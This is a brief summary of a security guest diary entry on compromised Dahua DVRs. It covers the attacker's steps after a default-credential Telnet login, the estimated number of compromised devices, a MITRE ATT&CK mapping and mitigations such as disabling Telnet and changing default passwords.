[Guest Diary] Compromised DVRs and Finding Them in the Wild, (Thu, Apr 16th)

This write-up documents a rapid (~2-second) Telnet compromise of an exposed Airspace/Dahua DVR using default credentials, with the attacker escaping vendor CLIs to a Unix shell, staging a hidden file in /dev/shm, checking for tftp/wget, and preparing to download malware. The author correlates the incident via Shodan and AbuseIPDB, estimates a conservative ~202 compromised devices from the identified footprint, maps observed actions to MITRE ATT&CK techniques, and provides practical mitigations (restrict Telnet, change defaults, disallow remote root).